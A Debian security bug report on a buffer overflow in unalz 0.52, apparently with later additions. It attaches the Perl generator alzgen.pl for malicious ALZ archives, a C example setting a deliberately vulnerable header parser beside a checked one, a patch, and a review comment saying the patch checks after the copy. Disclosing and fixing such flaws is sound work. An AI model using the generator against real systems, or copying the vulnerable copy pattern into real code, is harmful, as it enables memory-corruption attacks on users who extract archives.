Subject: unalz: buffer overflow when extracting archives
Package: unalz
Version: 0.52-1
Severity: grave
Justification: user security hole
Tags: security patch sarge etch sid
Hello,

I have found a buffer overflow security vulnerability in unalz. It occurs when it extracts malicious ALZ archives. I have attached the archives oflow333.alz (for sarge) and oflow1621.alz (for testing and unstable), as well as the program alzgen.pl that generated them and a patch that corrects this issue. It is also possible to upgrade to the latest upstream version 0.53, which also corrects it.

// Ulf Härnhammar, Debian Security Audit Project

-- System Information:
Debian Release: testing/unstable
  APT prefers testing
  APT policy: (500, 'testing')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.6.12-1-686
Locale: LANG=en_US, LC_CTYPE=en_US (charmap=ISO-8859-1)

Versions of packages unalz depends on:
ii  libc6       2.3.5-8    GNU C Library: Shared libraries an
ii  libgcc1     1:4.0.2-2  GCC support library
ii  libstdc++6  4.0.2-2    The GNU Standard C++ Library v3

unalz recommends no packages.

-- no debconf information
Attachment: oflow333.alz (Description: Binary data)
Attachment: oflow1621.alz (Description: Binary data)
Attachment: alzgen.pl

#!/usr/bin/perl --
# alzgen
# by Ulf Harnhammar in 2005
# I hereby place this program in the public domain.
#
# Writes a minimal ALZ archive whose local file header claims a file name of
# <length> bytes, followed by that many 'U' bytes.

use strict;
use warnings;

die "usage: $0 <length> <filename>\n" unless @ARGV == 2;

my $len   = shift;
my $lenhi = int($len / 256);           # high byte of the 16-bit length field
my $lenlo = $len - ($lenhi * 256);     # low byte
my $file  = shift;

open(OUT, ">$file") or die "can't open file!\n";
print OUT "\x42\x4c\x5a\x01" .         # SIG_LOCAL_FILE_HEADER ("BLZ\x01")
          chr($lenlo) . chr($lenhi) .  # filename length, little-endian
          "\x00" x 7 .                 # rest of the fixed header, zeroed
          'U' x $len;                  # the oversized "file name"
close OUT or die "can't close file!?!?\n";
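The following is an added illustration, not part of Ulf's report and not unalz code: a small C parser for the local file header exactly as alzgen.pl lays it out (4-byte signature, 2-byte little-endian name length, 7 further header bytes, then the name), written once in the vulnerable shape and once with the bound checked before the copy. MAX_PATH = 260, the function and field names, and the constructed archives are assumptions of this example; the real header struct in UnAlz.cpp may differ.

```c
/* Added example: parse the ALZ local file header the way alzgen.pl lays it out.
 * Not unalz code; MAX_PATH, the names and the sample archives are assumptions. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MAX_PATH     260   /* assumed value; unalz uses its platform's own */
#define ALZ_HEAD_LEN 13    /* 4-byte signature + 2-byte name length + 7 more header bytes */

/* "BLZ\x01": the SIG_LOCAL_FILE_HEADER bytes alzgen.pl writes first */
static const uint8_t ALZ_SIG[4] = { 0x42, 0x4c, 0x5a, 0x01 };

struct alz_local_header {
    uint16_t name_len;
    char     name[MAX_PATH];  /* fixed-size, like zipHeader.fileName in UnAlz.cpp */
};

/* Constructed input: emit header + name of the given length, mirroring alzgen.pl.
 * Returns the number of bytes written, 0 if cap is too small. */
size_t alzgen(uint8_t *buf, size_t cap, uint16_t len)
{
    size_t need = ALZ_HEAD_LEN + (size_t)len;
    if (cap < need) return 0;
    memcpy(buf, ALZ_SIG, 4);
    buf[4] = (uint8_t)(len & 0xff);          /* $lenlo */
    buf[5] = (uint8_t)(len >> 8);            /* $lenhi */
    memset(buf + 6, 0, 7);                   /* "\x00" x 7 */
    memset(buf + ALZ_HEAD_LEN, 'U', len);    /* 'U' x $len */
    return need;
}

/* Shared prefix: verify the signature and decode the little-endian length. */
static int read_head(const uint8_t *buf, size_t n, uint16_t *len)
{
    if (n < ALZ_HEAD_LEN || memcmp(buf, ALZ_SIG, 4) != 0) return -1;
    *len = (uint16_t)(buf[4] | (buf[5] << 8));
    return 0;
}

/* The 0.52 shape: copy name_len bytes into the fixed buffer, then store the NUL
 * at index name_len. name_len is attacker-controlled (0..65535), so any value
 * >= MAX_PATH writes past h->name. Only ever fed a short name in this demo. */
int parse_vulnerable(const uint8_t *buf, size_t n, struct alz_local_header *h)
{
    if (read_head(buf, n, &h->name_len) != 0) return -1;
    if (n < ALZ_HEAD_LEN + (size_t)h->name_len) return -1;
    memcpy(h->name, buf + ALZ_HEAD_LEN, h->name_len);   /* overflows for name_len > MAX_PATH */
    h->name[h->name_len] = '\0';                        /* overflows for name_len >= MAX_PATH */
    return 0;
}

/* Hardened: bound the length before a single byte is copied, and reject the
 * entry instead of clamping, so a truncated name cannot masquerade as another path. */
int parse_checked(const uint8_t *buf, size_t n, struct alz_local_header *h)
{
    uint16_t len;
    if (read_head(buf, n, &len) != 0) return -1;
    if (len >= MAX_PATH) return -2;                   /* len bytes plus the NUL must fit */
    if (n < ALZ_HEAD_LEN + (size_t)len) return -1;    /* truncated archive */
    h->name_len = len;
    memcpy(h->name, buf + ALZ_HEAD_LEN, len);
    h->name[len] = '\0';
    return 0;
}

int main(void)
{
    static uint8_t arc_short[ALZ_HEAD_LEN + 16];
    static uint8_t arc_long[ALZ_HEAD_LEN + 1621];   /* same name length as oflow1621.alz */
    struct alz_local_header h;
    size_t n;
    int rc;

    n = alzgen(arc_short, sizeof arc_short, 5);
    rc = parse_vulnerable(arc_short, n, &h);
    printf("5-byte name:    vulnerable=%d name=%s\n", rc, h.name);
    rc = parse_checked(arc_short, n, &h);
    printf("5-byte name:    checked=%d name=%s\n", rc, h.name);

    n = alzgen(arc_long, sizeof arc_long, 1621);
    rc = parse_checked(arc_long, n, &h);
    printf("1621-byte name: checked=%d (parse_vulnerable would smash the stack here)\n", rc);
    return 0;
}
```

The point of the two parsers side by side is ordering: the checked one compares the attacker-supplied length against the buffer before the memcpy and refuses the entry, whereas a check placed after the copy can at best protect the terminating NUL store. The demo only hands parse_vulnerable a 5-byte name; a 1621-byte one, the length used for oflow1621.alz, would corrupt the stack of the calling function.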
--- UnAlz.cpp.old 2004-11-25 07:23:36.000000000 +0100 +++ UnAlz.cpp 2005-11-20 01:04:23.000000000 +0100 @@ -359,6 +359,8 @@ return FALSE; } FRead(zipHeader.fileName, zipHeader.head.fileNameLength); + if(zipHeader.head.fileNameLength > MAX_PATH - 5) + zipHeader.head.fileNameLength = MAX_PATH - 5; zipHeader.fileName[zipHeader.head.fileNameLength] = (CHAR)NULL;
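Review bot: the new bound is applied after FRead has already copied fileNameLength bytes into zipHeader.fileName, so it only protects the terminator store at `zipHeader.fileName[zipHeader.head.fileNameLength]`; the read itself still overruns the buffer for any length above its size unless an earlier check not shown in the hunk rejects it. Move the comparison above the `FRead(zipHeader.fileName, zipHeader.head.fileNameLength);` call, and since the surrounding code already uses `return FALSE;` for a bad header, reject oversized lengths the same way rather than silently truncating the name to MAX_PATH - 5; the -5 also needs a comment saying what the five spare bytes are reserved for.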